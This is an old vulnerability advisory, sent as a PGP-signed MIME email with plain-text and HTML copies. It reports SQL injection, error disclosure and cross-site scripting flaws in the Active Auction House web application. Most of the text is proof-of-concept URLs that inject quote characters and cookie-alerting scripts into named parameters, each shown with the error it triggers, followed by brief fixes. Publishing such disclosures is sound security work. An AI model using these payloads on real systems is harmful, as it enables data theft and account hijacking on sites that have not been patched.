This is a multi-part message in MIME format. ------=_NextPart_000_0006_01C53A39.2224C870 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dcrab 's Security Advisory [Hsc Security Group] http://www.hackerscenter.com/ [dP Security] http://digitalparadox.org/ Get Dcrab's Services to audit your Web servers, scripts, networks, etc. = Learn more at http://www.digitalparadox.org/services.ah Severity: High Title: Active Auction House has multiple Sql injection, error and XSS = vulnerabilities Date: 06/04/2005 Vendor: Active Web Softwares Vendor Website: www.activewebsoftwares.com Summary: Active auction house has multiple sql injection, error and xss = vulnerabilities. Proof of Concept Exploits:=20 http://localhost/activeauctionsuperstore/default.asp?catid=3D'SQL_ERROR SQL ERROR Microsoft OLE DB Provider for ODBC Drivers error '80040e21' ODBC driver does not support the requested properties. /activeauctionsuperstore/displaycategories.asp, line 52 http://localhost/activeauctionsuperstore/default.asp?Sortby=3DItemName&So= rtDir=3D'SQL_INJECTION SQL INJECTION Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in = query expression 'ItemName 'SQL_INJECTION'. /activeauctionsuperstore/includes/gentable.asp, line 39 http://localhost/activeauctionsuperstore/default.asp?Sortby=3D'SQL_INJECT= ION SQL INJECTION Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in = query expression ''SQL_INJECTION'. /activeauctionsuperstore/includes/gentable.asp, line 39 http://localhost/activeauctionsuperstore/ItemInfo.asp?itemID=3D'SQL_INJEC= TION SQL INJECTION Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in = query expression 'ItemID=3D'SQL_INJECTION'. /activeauctionsuperstore/ItemInfo.asp, line 18 http://localhost/activeauctionsuperstore/sendpassword.asp SQL INJECTON In the Email field enter a sql injection and done ;) For example entering 'SQL_INJECTION you get Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in FROM clause. /activeauctionsuperstore/sendpassword.asp, line 45 http://localhost/activeauctionsuperstore/?ReturnURL=3D'%3E%3Cscript%3Eale= rt(document.cookie)%3C/script%3E&username=3Ddcrab&password=3D Pops cookie http://localhost/activeauctionsuperstore/?ReturnURL=3Dstart.asp&username=3D= dcrab&password=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Pops cookie http://localhost/activeauctionsuperstore/?ReturnURL=3Dstart.asp&username=3D= '%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&&password=3D Pops cookie http://localhost/activeauctionsuperstore/account.asp?ReturnURL=3D%22%3E%3= Cscript%3Ealert(document.cookie)%3C/script%3E Pops cookie http://localhost/activeauctionsuperstore/sendpassword.asp?Table=3DAccount= s&Title=3D'php_evil_valuehttp://localhost/activeauctionsuperstore/sendpas= sword.asp?Table=3DAccounts&Title=3D%22%3E%3Cscript%3Ealert(document.cooki= e)%3C/script%3E Pops cookie http://localhost/activeauctionsuperstore/sendpassword.asp?Table=3DAccount= s&Title=3D"><script>alert(document.cookie)</script> Pops cookie http://localhost/activeauctionsuperstore/sendpassword.asp?Table=3D"><scri= pt>alert(document.cookie)</script>&Title=3DAccount Pops cookie http://localhost/activeauctionsuperstore/watchthisitem.asp?itemid=3D"><sc= ript>alert(document.cookie)</script>&%3baccountid=3D Pops cookie Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), = mysql_real_escape_string() and other functions for input validation = before passing user input to the mysql database, or before echoing data = on the screen, would solve these problems. Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah Author:=20 These vulnerabilties have been found and released by Diabolic Crab, = Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to = contact me regarding these vulnerabilities. You can find me at, = http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for = my soon to come out book on Secure coding with php. -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 - not licensed for commercial use: www.pgp.com iQA/AwUBQlLSLSZV5e8av/DUEQJy+wCfficKxFWekfTVbslFf6X2fYgkFZ0AniJA lWYvwOWmoKGHgDKanamGDcvc =3DGAwn -----END PGP SIGNATURE----- ------=_NextPart_000_0006_01C53A39.2224C870 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=3DContent-Type content=3D"text/html; = charset=3Diso-8859-1"> <META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#ffffff> <DIV><FONT face=3DArial size=3D2>-----BEGIN PGP SIGNED = MESSAGE-----<BR>Hash:=20 SHA1</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR>[Hsc = Security Group]=20 <A = href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><= BR>[dP=20 Security] <A=20 href=3D"http://digitalparadox.org/">http://digitalparadox.org/</A></FONT>= </DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>Get Dcrab's Services to audit your Web = servers,=20 scripts, networks, etc. Learn more at <A=20 href=3D"http://www.digitalparadox.org/services.ah">http://www.digitalpara= dox.org/services.ah</A></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>Severity: High<BR>Title: Active Auction = House has=20 multiple Sql injection, error and XSS vulnerabilities<BR>Date:=20 06/04/2005</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>Vendor: Active Web Softwares<BR>Vendor = Website: <A=20 href=3D"http://www.activewebsoftwares.com">www.activewebsoftwares.com</A>= <BR>Summary:=20 Active auction house has multiple sql injection, error and xss=20 vulnerabilities.</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>Proof of Concept Exploits: = </FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><A=20 href=3D"http://localhost/activeauctionsuperstore/default.asp?catid=3D'SQL= _ERROR">http://localhost/activeauctionsuperstore/default.asp?catid=3D'SQL= _ERROR</A><BR>SQL=20 ERROR<BR>Microsoft OLE DB Provider for ODBC Drivers error=20 '80040e21'</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>ODBC driver does not support the = requested=20 properties.</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial = size=3D2>/activeauctionsuperstore/displaycategories.asp,=20 line 52</FONT></DIV> <DIV> </DIV><FONT face=3DArial size=3D2> <DIV><BR><A=20 href=3D"http://localhost/activeauctionsuperstore/default.asp?Sortby=3DIte= mName&SortDir=3D'SQL_INJECTION">http://localhost/activeauctionsuperst= ore/default.asp?Sortby=3DItemName&SortDir=3D'SQL_INJECTION</A><BR>SQL= =20 INJECTION<BR>Microsoft OLE DB Provider for ODBC Drivers error = '80040e14'</DIV> <DIV> </DIV> <DIV>[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in = query=20 expression 'ItemName 'SQL_INJECTION'.</DIV> <DIV> </DIV> <DIV>/activeauctionsuperstore/includes/gentable.asp, line 39</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D"http://localhost/activeauctionsuperstore/default.asp?Sortby=3D'SQ= L_INJECTION">http://localhost/activeauctionsuperstore/default.asp?Sortby=3D= 'SQL_INJECTION</A><BR>SQL=20 INJECTION<BR>Microsoft OLE DB Provider for ODBC Drivers error = '80040e14'</DIV> <DIV> </DIV> <DIV>[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in = query=20 expression ''SQL_INJECTION'.</DIV> <DIV> </DIV> <DIV>/activeauctionsuperstore/includes/gentable.asp, line 39</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D"http://localhost/activeauctionsuperstore/ItemInfo.asp?itemID=3D'S= QL_INJECTION">http://localhost/activeauctionsuperstore/ItemInfo.asp?itemI= D=3D'SQL_INJECTION</A><BR>SQL=20 INJECTION<BR>Microsoft OLE DB Provider for ODBC Drivers error = '80040e14'</DIV> <DIV> </DIV> <DIV>[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in = query=20 expression 'ItemID=3D'SQL_INJECTION'.</DIV> <DIV> </DIV> <DIV>/activeauctionsuperstore/ItemInfo.asp, line 18</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D"http://localhost/activeauctionsuperstore/sendpassword.asp">http:/= /localhost/activeauctionsuperstore/sendpassword.asp</A><BR>SQL=20 INJECTON<BR>In the Email field enter a sql injection and done ;) For=20 example<BR>entering 'SQL_INJECTION you get<BR>Microsoft OLE DB Provider = for ODBC=20 Drivers error '80040e14'</DIV> <DIV> </DIV> <DIV>[Microsoft][ODBC Microsoft Access Driver] Syntax error in=20 FROM<BR>clause.</DIV> <DIV> </DIV> <DIV>/activeauctionsuperstore/sendpassword.asp, line 45</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D"http://localhost/activeauctionsuperstore/?ReturnURL=3D'%3E%3Cscri= pt%3Ealert(document.cookie)%3C/script%3E&username=3Ddcrab&passwor= d">http://localhost/activeauctionsuperstore/?ReturnURL=3D'%3E%3Cscript%3E= alert(document.cookie)%3C/script%3E&username=3Ddcrab&password</A>= =3D<BR>Pops=20 cookie</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D"http://localhost/activeauctionsuperstore/?ReturnURL=3Dstart.asp&a= mp;username=3Ddcrab&password=3D'%3E%3Cscript%3Ealert(document.cookie)= %3C/script%3E">http://localhost/activeauctionsuperstore/?ReturnURL=3Dstar= t.asp&username=3Ddcrab&password=3D'%3E%3Cscript%3Ealert(document.= cookie)%3C/script%3E</A><BR>Pops=20 cookie</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D"http://localhost/activeauctionsuperstore/?ReturnURL=3Dstart.asp&a= mp;username=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&&am= p;password">http://localhost/activeauctionsuperstore/?ReturnURL=3Dstart.a= sp&username=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&= ;&password</A>=3D<BR>Pops=20 cookie</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D"http://localhost/activeauctionsuperstore/account.asp?ReturnURL=3D= %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E">http://localhost/a= ctiveauctionsuperstore/account.asp?ReturnURL=3D%22%3E%3Cscript%3Ealert(do= cument.cookie)%3C/script%3E</A><BR>Pops=20 cookie</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D"http://localhost/activeauctionsuperstore/sendpassword.asp?Table=3D= Accounts&Title=3D'php_evil_valuehttp://localhost/activeauctionsuperst= ore/sendpassword.asp?Table=3DAccounts&Title=3D%22%3E%3Cscript%3Ealert= (document.cookie)%3C/script%3E">http://localhost/activeauctionsuperstore/= sendpassword.asp?Table=3DAccounts&Title=3D'php_evil_valuehttp://local= host/activeauctionsuperstore/sendpassword.asp?Table=3DAccounts&Title=3D= %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E</A><BR>Pops=20 cookie</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D'http://localhost/activeauctionsuperstore/sendpassword.asp?Table=3D= Accounts&Title=3D"><script>alert(document.cookie)</script'>http://loc= alhost/activeauctionsuperstore/sendpassword.asp?Table=3DAccounts&Titl= e=3D"><script>alert(document.cookie)</script</A>><BR>Pops = cookie</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D'http://localhost/activeauctionsuperstore/sendpassword.asp?Table=3D= "><script>alert(document.cookie)</script>&Title=3DAccount'>http://loc= alhost/activeauctionsuperstore/sendpassword.asp?Table=3D"><script&g= t;alert(document.cookie)</script>&Title=3DAccount</A><BR>Pops=20 cookie</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D'http://localhost/activeauctionsuperstore/watchthisitem.asp?itemid= =3D"><script>alert(document.cookie)</script>&amp%3baccountid'>http://= localhost/activeauctionsuperstore/watchthisitem.asp?itemid=3D"><scr= ipt>alert(document.cookie)</script>&amp%3baccountid</A>=3D<B= R>Pops=20 cookie</DIV> <DIV> </DIV> <DIV><BR>Possible Fixes: The usage of htmlspeacialchars(),=20 mysql_escape_string(), mysql_real_escape_string() and other functions = for input=20 validation before passing user input to the mysql database, or before = echoing=20 data on the screen, would solve these problems.</DIV> <DIV> </DIV> <DIV>Keep your self updated, Rss feed at: <A=20 href=3D"http://digitalparadox.org/rss.ah">http://digitalparadox.org/rss.a= h</A></DIV> <DIV> </DIV> <DIV>Author: <BR>These vulnerabilties have been found and released by = Diabolic=20 Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel = free to=20 contact me regarding these vulnerabilities. You can find me at, <A=20 href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> = or <A=20 href=3D"http://digitalparadox.org/">http://digitalparadox.org/</A>. = Lookout for my=20 soon to come out book on Secure coding with php.</DIV> <DIV> </DIV> <DIV>-----BEGIN PGP SIGNATURE-----<BR>Version: PGP 8.1 - not licensed = for=20 commercial use: <A href=3D"http://www.pgp.com">www.pgp.com</A></DIV> <DIV> </DIV> <DIV>iQA/AwUBQlLSLSZV5e8av/DUEQJy+wCfficKxFWekfTVbslFf6X2fYgkFZ0AniJA<BR>= lWYvwOWmoKGHgDKanamGDcvc<BR>=3DGAwn<BR>-----END=20 PGP SIGNATURE-----<BR></FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV></BODY></HTML> ------=_NextPart_000_0006_01C53A39.2224C870--